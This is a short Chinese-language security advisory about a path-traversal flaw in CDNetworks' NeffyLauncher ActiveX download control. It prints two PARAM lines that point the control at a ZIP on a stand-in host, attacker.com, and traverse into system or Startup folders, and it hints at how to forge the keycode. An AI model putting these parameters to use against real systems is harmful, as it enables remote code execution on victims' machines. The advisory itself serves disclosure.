BUGTRAQ ID: 28666
CDNetworks是亚洲最大的CDN服务供应商,提供各种在线游戏和视频服务。
CDNetworks所提供的ActiveX控件实现上存在漏洞,远程攻击者可能利用此漏洞控制用户系统。
Neffycient Download(NeffyLauncher.dll,AA07EBD2-EBDD-4BD6-9F8F-114BD513492C)是CDNetworks所提供的ActiveX控件,用于通过HTTP、FTP等下载和升级游戏安装文件。如果用户对使用该控件站点的版面拥有写权限的话,或获得了有效的keycode的话,就可以修改HttpSkin、SkinPath的值。站点上的恶意文件必须压缩为ZIP文件,例如,以下修改可以将恶意文件拷贝到Windows的根目录:
<PARAM NAME="HttpSkin" VALUE="http://www.attacker.com/maliciousFiles.zip">
<PARAM NAME="SkinPath" VALUE="../../../../">
这样攻击者就可以将SkinPath的值修改为所有用户的开始程序文件夹,当用户启动计算机时就会执行恶意程序。
攻击者还可以通过调试这个ActiveX控件来生成keycode值。keycode值的前两个数字代表域的长度(16进制),接下来的5个(或更多)数字用于计算域。
CDNetworks NeffyLauncher 1.0.5
CDNetworks
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
<a href=http://www.cdnetworks.com/ target=_blank>http://www.cdnetworks.com/</a>
暂无评论